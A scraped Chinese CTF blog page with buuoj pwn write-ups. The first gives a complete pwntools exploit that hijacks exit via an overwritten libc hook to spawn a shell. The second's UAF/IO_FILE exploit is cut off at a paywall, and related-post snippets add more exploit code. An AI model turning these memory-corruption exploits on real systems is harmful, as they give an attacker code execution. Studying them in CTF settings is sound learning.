buuoj Pwn writeup 201-205

最新推荐文章于 2022-10-03 11:01:52 发布
原创 最新推荐文章于 2022-10-03 11:01:52 发布 · 587 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细分析了多个CTF挑战,涉及栈溢出、未初始化指针利用、堆管理漏洞及libc地址泄露等技术。通过创建shellcode、劫持程序流程、利用fastbin攻击泄露libc地址,最终实现getshell。文章揭示了多种常见的二进制安全漏洞利用方法。

201 bbctf_2020_write

在这里插入图片描述
canary是没有开的。环境是2.27的一个环境。

在这里插入图片描述
可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。
又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。

那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。
exit没有hook,我们考虑怎么能把exit劫持掉。
劫持exit

简单点说就是。
exit()->__run_exit_handlers->_dl_fini->__rtld_lock_unlock_recursive
由于__rtld_lock_unlock_recursive存放在结构体空间,为可读可写,那么如果可以修改__rtld_lock_unlock_recursive,就可以在调用exit()时劫持程序流。

exp

from pwn import*

context.log_level = "debug"

#r = process("./201")
r = remote("node4.buuoj.cn", "29284")


libc = ELF("./64/libc-2.27.so")

r.recvuntil("0x")
puts_addr = int(r.recv(12), 16)
r.recvuntil("0x")
stack_addr = int(r.recv(12), 16)

ret_addr = stack_addr + 0x20
libc_base = puts_addr - libc.sym['puts']
one_gadget = libc_base + 0x4f322
print "libc_base = " + hex(libc_base)
exit_hook = libc_base + 0x619f68

r.recvuntil("(q)uit\n")
r.sendline("w")

r.sendline(str(exit_hook))
r.sendline(str(one_gadget))

#gdb.attach(r)

r.recvuntil("(q)uit\n")
r.sendline("q")

r.interactive()


'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

202 ciscn_2019_c_5

在这里插入图片描述

在这里插入图片描述
名字跟id就有了。

add
在这里插入图片描述大小,chunk地址,都子啊bss上,一个chunk的信息也都相邻。

没有edit、show。

free
在这里插入图片描述free这里有个uaf。

没有输出的话我们还是考虑需要去攻击IO_FILE。

劫持IO_FILE的时候因为我们只修改后20bit,但是没办法只能改到24bit,所以我们还必须爆破一下。

通过fastbin攻击来泄露libc地址,然后故技重施劫持free_hook,来gelshell。

exp

# -*- coding: utf-8 -*-
from pwn import*

#context.log_level = "debug"

def add(size, content):
    r.sendlineafter("Input your choice:", "1")
    r.sendlineafter("Please input the size of story: \n", str(size))
    r.sendafter("please inpute the story: \n", content)

def delete(index):
    r.sendlineafter("Input your choice:", "4")
    r.sendlineafter("Please input the index:\n", str(index))


libc = ELF('./64/libc-2.27.so')
_IO_2_1_stdout_s = libc.symbols['_IO_2_1_stdout_']
free_hook_s = libc.symbols['__free_hook']

def exp():
    r.sendlineafter("What's your name?\n", "Yongibaoi")
    r.sendlineafter("Please input your ID.\n", "0")

    add(0x7F,
最低0.47元/天 解锁文章
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 457
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
PWN · 格式化字符串|劫持GOT】[watevrCTF 2019]Voting Machine 2]
最新发布
Mr_Fmnwon的博客
01-18 860
和以往不同的是,格式化字符产参数没有对齐,有两个字节的偏移需要自己填充或者交给fmtstr_payload的参数进行构造。可以通过后门函数获得flag或者getshell获得flag存在两个字节的偏移,fmtstr_payload的各个参数含义要好好掌握。
buuoj Pwn writeup 126-130
yongbaoii的博客
05-11 362
126 护网杯_2018_gettingstart 保护 程序就这么点,逻辑也简单。 然后有个栈溢出。 然后就修改修改就好了嘛,把v7改成0x7fffffffffffffff,v8改成0.1 exp from pwn import* r = remote("node3.buuoj.cn", 28793) #r = process("./126") payload = 'a' * 0x18 + p64(0x7fffffffffffffff) + p64(0x3FB999999999999A) r.re
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 661
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
hfctf_2020_marksman
z1r0的博客
03-20 645
hfctf_2020_marksman 查看保护 这里输入地址,然后改这个地址的低三个字节,也就是任意地址写三字节 攻击思路:这里最关键是需要劫持哪一个地址然后跳转到哪一个gadget。 为什么会说跳转到哪一个gadget? 在这个函数中会将一些gadget给禁用掉,举第一个例子 可以看到这个gadget被禁用了。 1.首先题目给了puts的地址。拿到Libc 2.写入要覆盖的地址,这里可以选择libc的got地址(这里笔者也学到了.got.plt一般是可写的,查看保护看的只是got不可写而已,笔
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 364
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 骇极杯_2018_babyarm 249 metasequoia_2020_samsara
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 384
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 473
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
exit_hook劫持
starssgo的博客
04-13 5998
更改exit()某一结构体,再调用exit()可以实现程序流程的劫持。 原理分析 首先查看exit()源代码,我的libc=2.27 调用__run_exit_handlers函数,查看源代码, exit.c 77行。 while (cur->idx > 0) { struct exit_function *const f = &cur->fns[-...
pwn题bbctf_2020_fmt_me
热门推荐
stareforever的博客
12-21 2万+
BUUCTF pwn题bbctf_2020_fmt_me 题目流程 snprintf 格式化漏洞 用gdb查看第一个参数的内容即可观察 参数位置在bss 0x4040a0 偏移为6 那么依据题目的意思 可以将atoi 改为system_plt; 将system_got改为main返回再次输入/bin/sh获得shell 完整ex.py ...
hitcon training lab12(secretgarden)
m0_62326489的博客
08-12 257
hfctf_2020_marksman(劫持exit_hook或dlopen)
tbsqigongzi的博客
08-12 1163
劫持exit_hook或dlopen
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1404
CISCN2021pwn pwny(数组越界,劫持exit_hook)
buuoj Pwn writeup 96-100
yongbaoii的博客
03-08 389
96 mrctf2020_easy_equation 保护 97 ciscn_2019_final_2 保护 98 ciscn_2019_s_9 保护 99 gyctf_2020_force 保护 100 [极客大挑战 2019]Not Bad 保护
buuoj Pwn writeup 46-50
yongbaoii的博客
02-16 263
46 jarvisoj_test_your_memory 保护 这个地方有个溢出。 后门函数,cat flag都有,就直接一把梭。 from pwn import* r = process('./46') system_addr = 0x08048440 cat_flag = 0x080487E0 payload='A'*0x17 + p32(system_addr) + p32(cat_flag) + p32(cat_flag) r.sendline(payload) r.interac
buuoj Pwn writeup 136-140
yongbaoii的博客
05-16 280
136 zctf_2016_note3 保护 菜单堆。 new 会有bss上的一个数组,用来存放chunk的大小以及最近一次申请回来的chunk的地址。 edit free 清理干净了。 137 wdb_2018_3rd_soEasy 保护 挺明显的。 因为没有开NX,还有栈溢出,所以直接写好shellcode然后跳回来到buf执行就好了。 exp from pwn import* r = remote("node3.buuoj.cn", 29859) r.recvuntil("0x") buf_a
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 1102
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
BUUCTF——Basic题解
Zichel77的博客
08-17 7790
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值